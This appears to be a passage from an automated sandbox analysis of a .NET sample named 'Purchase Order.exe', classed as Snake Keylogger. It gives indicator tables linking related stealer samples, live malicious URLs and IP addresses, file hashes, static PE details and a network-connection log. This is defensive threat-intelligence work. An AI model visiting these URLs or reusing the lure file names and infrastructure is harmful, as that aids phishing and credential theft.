	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	193.122.130.0
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	132.226.8.169
	Quark Browser.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	193.122.130.0
	Hitomi Downloader.exe	Get hash	malicious	Agent Tesla, AgentTesla, RisePro Stealer	Browse	158.101.44.242
us2.smtp.mailhostbox.com	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	208.91.198.143
	Dhl 984857.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	Dhl 0393837.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	208.91.199.225
	SecuriteInfo.com.Win32.TrojanX-gen.27067.30548.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	6P8VytD7wo.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	RFQ DM03058 pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.91.198.143
	DHL Waybill & Shipping Documents.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	Quotation - HDPE Fittings.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
reallyfreegeoip.org	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.67.152
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.67.152
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	PT98765445670009.scr.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	8wvP84hzFu.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	SDTP098766700000.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	sipari#U015f formu_831512.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	lxdriver_setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	158.101.44.242
	iCareFone.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	193.122.130.0
	http://winning.com.de/4LcLKX1386KvIx6mvpavrrenj4MMBOXAWOTDNDYZC32415IMVO1140976R30	Get hash	malicious	Unknown	Browse	193.122.130.38
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	http://evvitteponn.info/	Get hash	malicious	HTMLPhisher	Browse	150.136.26.45
	http://zarabidarix.xyz/4kKUDf2271ibnX494fplpivknze26JVIISAKNWCQFBYE13955JAYA338314o10	Get hash	malicious	Unknown	Browse	193.122.130.38
	http://zarabidarix.xyz/4kKUDf2271ibnX494fplpivknze26JVIISAKNWCQFBYE13955JAYA338314o10	Get hash	malicious	Unknown	Browse	150.136.26.45
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	193.122.6.168
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	193.122.130.0
	Quark Browser.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	193.122.130.0
CLOUDFLARENETUS	https://amhhs-my.sharepoint.com/:b:/p/mariaelenavela/ERqwdIy-25tMlQKY1zNTGrgB_3-8eK9_x2PwnNvX6yrDew?e=2hWFz2	Get hash	malicious	Unknown	Browse	104.17.3.184
	https://campus.espaciocicfa.com/Sharepointproposal/	Get hash	malicious	Unknown	Browse	104.17.2.184
	Bsd3EvU0UH.exe	Get hash	malicious	LummaC	Browse	104.21.80.153
	5zq2Yob8xh.exe	Get hash	malicious	GCleaner, Glupteba, Mars Stealer, Meduza Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	104.21.36.53
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	162.159.133.233
	nq5gQXmhPL.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	SecuriteInfo.com.Win32.PWSX-gen.13751.24467.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	bX5uIt2kh3.exe	Get hash	malicious	LummaC, PureLog Stealer, RisePro Stealer	Browse	172.67.136.26
	file.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	00eEcX26T5.exe	Get hash	malicious	LummaC, PureLog Stealer, RisePro Stealer	Browse	104.26.4.15
PUBLIC-DOMAIN-REGISTRYUS	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	208.91.198.143
	https://m.exactag.com/ai.aspx?tc=d9985160bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41hilanddalry.net%2Ftoro%2F67328%2F%2FYWxla3NhbmRlckBtaWRsYW5kY29tcHV0ZXJzLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	162.222.227.139
	PURCHASE ORDER MSM09897.PDF.exe	Get hash	malicious	AgentTesla	Browse	207.174.215.2
	Dhl 984857.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	Dhl 0393837.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	208.91.199.225
	SecuriteInfo.com.Win32.TrojanX-gen.27067.30548.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	WNGO8CYRZG.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	6P8VytD7wo.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
CLOUDFLARENETUS	https://amhhs-my.sharepoint.com/:b:/p/mariaelenavela/ERqwdIy-25tMlQKY1zNTGrgB_3-8eK9_x2PwnNvX6yrDew?e=2hWFz2	Get hash	malicious	Unknown	Browse	104.17.3.184
	https://campus.espaciocicfa.com/Sharepointproposal/	Get hash	malicious	Unknown	Browse	104.17.2.184
	Bsd3EvU0UH.exe	Get hash	malicious	LummaC	Browse	104.21.80.153
	5zq2Yob8xh.exe	Get hash	malicious	GCleaner, Glupteba, Mars Stealer, Meduza Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	104.21.36.53
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	162.159.133.233
	nq5gQXmhPL.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	SecuriteInfo.com.Win32.PWSX-gen.13751.24467.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	bX5uIt2kh3.exe	Get hash	malicious	LummaC, PureLog Stealer, RisePro Stealer	Browse	172.67.136.26
	file.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	00eEcX26T5.exe	Get hash	malicious	LummaC, PureLog Stealer, RisePro Stealer	Browse	104.26.4.15

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	lxdriver_setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.177.134
	iCareFone.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.177.134
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	Quark Browser.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.177.134
	Hitomi Downloader.exe	Get hash	malicious	Agent Tesla, AgentTesla, RisePro Stealer	Browse	172.67.177.134
3b5074b1b5d032e5620f69f9f700ff0e	54ZmPO0sGj.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	104.21.27.85
	yCuLh85yLP.exe	Get hash	malicious	Quasar	Browse	104.21.27.85
	SecuriteInfo.com.Win32.PWSX-gen.13751.24467.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	PURCHASE ORDER MSM09897.PDF.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	Halkbank,pdf.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	Dhl 984857.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	DHL - OVERDUE ACCOUNT NOTICE -1301858139#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.27.85
	Dhl 0393837.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	Purchasing_49427020424_8568658.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.27.85

Process:	C:\Users\user\Desktop\Purchase Order.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.894453896411025
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Purchase Order.exe
File size:	546'304 bytes
MD5:	7eb1409fed2a2b740122f997a76f7a94
SHA1:	8cc9e2d414bc1c8964b965989fb6648857ae9892
SHA256:	ff2ae4fd71daa1a98edd5f88b743a5daa5fb29f70b87dee08fec25313a3640f1
SHA512:	e1df8be427c813ded706628025f38454520a24990b8be54893132b9a44f6874cef1b54f51fa3dd4f56c9622df73ab71fc14ded126c262eea3f3d515039c238a0
SSDEEP:	12288:/WUHaP7P5nea9GotNgJ9/KYEQDSAj/aK5zYFQCmO5lT05G:/lHgj5nbGotNCVDSAWKcQCxQ
TLSH:	FCC4020032BE8FA3F1FA5BF9957160014BF2792B69A1D35C1DC240EA1AB1F854B52B97
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T.................0..L..........:j... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x486a3a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xAEDBFD54 [Mon Dec 18 07:33:40 2062 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
xor al, 38h
xor eax, 38483446h
xor al, 47h
dec eax
xor eax, 00003447h
add byte ptr [edx], dh
inc ebx
inc edx
push ebx
aaa
dec eax
xor eax, 00003439h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x869e5	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x88000	0x5ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8472c	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x84a60	0x84c00	533d9e7da4a48ca75ce205e3c4316b97	False	0.927423566972693	data	7.903744951141462	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x88000	0x5ac	0x600	8e1fc9406ffed700c1f27b898b5e721a	False	0.4212239583333333	data	4.085930028140814	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8a000	0xc	0x200	198aa9645fa732010826ca2e3703dd99	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x88090	0x31c	data			0.4334170854271357
RT_MANIFEST	0x883bc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 4, 2024 12:56:13.815099001 CEST	49709	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:13.970777988 CEST	80	49709	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:13.970935106 CEST	49709	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:13.971292019 CEST	49709	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:14.126111984 CEST	80	49709	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:15.125416994 CEST	80	49709	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:15.130779982 CEST	49709	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:15.285825968 CEST	80	49709	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:17.284769058 CEST	80	49709	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:17.328850985 CEST	49709	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:17.444839001 CEST	49710	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:17.444890022 CEST	443	49710	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:17.444979906 CEST	49710	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:17.449656010 CEST	49710	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:17.449678898 CEST	443	49710	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:17.711174011 CEST	443	49710	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:17.711270094 CEST	49710	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:17.715713978 CEST	49710	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:17.715729952 CEST	443	49710	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:17.716027975 CEST	443	49710	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:17.765374899 CEST	49710	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:17.812237978 CEST	443	49710	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:18.005263090 CEST	443	49710	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:18.005362988 CEST	443	49710	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:18.005414009 CEST	49710	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:18.011497974 CEST	49710	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:18.014492035 CEST	49709	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:18.168034077 CEST	80	49709	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:18.169435978 CEST	80	49709	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:18.172318935 CEST	49711	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:18.172379971 CEST	443	49711	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:18.172461033 CEST	49711	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:18.172785997 CEST	49711	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:18.172795057 CEST	443	49711	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:18.219433069 CEST	49709	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:18.433919907 CEST	443	49711	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:18.436080933 CEST	49711	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:18.436110973 CEST	443	49711	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:18.733483076 CEST	443	49711	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:18.733580112 CEST	443	49711	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:18.733622074 CEST	49711	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:18.734108925 CEST	49711	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:18.737242937 CEST	49709	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:18.738414049 CEST	49712	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:18.890719891 CEST	80	49709	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:18.890790939 CEST	49709	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:18.892090082 CEST	80	49712	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:18.892172098 CEST	49712	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:18.892283916 CEST	49712	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:19.045840025 CEST	80	49712	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:19.046482086 CEST	80	49712	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:19.047755003 CEST	49713	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:19.047785997 CEST	443	49713	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:19.047846079 CEST	49713	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:19.048058033 CEST	49713	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:19.048074961 CEST	443	49713	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:19.094399929 CEST	49712	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:19.307212114 CEST	443	49713	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:19.309032917 CEST	49713	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:19.309060097 CEST	443	49713	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:19.606411934 CEST	443	49713	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:19.606534004 CEST	443	49713	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:19.606625080 CEST	49713	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:19.607201099 CEST	49713	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:19.612240076 CEST	49714	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:19.766412973 CEST	80	49714	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:19.766539097 CEST	49714	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:19.766798019 CEST	49714	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:19.920767069 CEST	80	49714	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:20.001530886 CEST	80	49714	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:20.003391981 CEST	49715	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:20.003422022 CEST	443	49715	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:20.003499031 CEST	49715	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:20.003818989 CEST	49715	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:20.003830910 CEST	443	49715	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:20.047529936 CEST	49714	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:20.259511948 CEST	443	49715	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:20.261204004 CEST	49715	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:20.261228085 CEST	443	49715	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:20.555280924 CEST	443	49715	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:20.555408955 CEST	443	49715	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:20.555499077 CEST	49715	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:20.556710958 CEST	49715	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:20.561949015 CEST	49714	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:20.562583923 CEST	49716	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:20.715893030 CEST	80	49714	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:20.716029882 CEST	49714	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:20.716329098 CEST	80	49716	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:20.716449976 CEST	49716	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:20.716679096 CEST	49716	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:20.872807980 CEST	80	49716	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:20.873720884 CEST	80	49716	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:20.877502918 CEST	49717	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:20.877568960 CEST	443	49717	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:20.877639055 CEST	49717	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:20.877922058 CEST	49717	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:20.877937078 CEST	443	49717	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:20.922522068 CEST	49716	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:21.138377905 CEST	443	49717	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:21.140515089 CEST	49717	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:21.140551090 CEST	443	49717	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:21.441795111 CEST	443	49717	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:21.441914082 CEST	443	49717	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:21.442027092 CEST	49717	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:21.442636967 CEST	49717	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:21.446249008 CEST	49716	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:21.447542906 CEST	49718	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:21.600012064 CEST	80	49716	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:21.600075006 CEST	49716	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:21.601001024 CEST	80	49718	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:21.601073027 CEST	49718	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:21.601238966 CEST	49718	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:21.754828930 CEST	80	49718	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:21.755465984 CEST	80	49718	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:21.757188082 CEST	49719	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:21.757227898 CEST	443	49719	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:21.757323027 CEST	49719	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:21.757594109 CEST	49719	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:21.757605076 CEST	443	49719	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:21.797534943 CEST	49718	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:22.015300035 CEST	443	49719	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:22.017620087 CEST	49719	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:22.017671108 CEST	443	49719	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:22.318196058 CEST	443	49719	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:22.318461895 CEST	443	49719	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:22.318538904 CEST	49719	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:22.318964958 CEST	49719	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:22.322590113 CEST	49718	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:22.323198080 CEST	49720	80	192.168.2.5	193.122.130.0
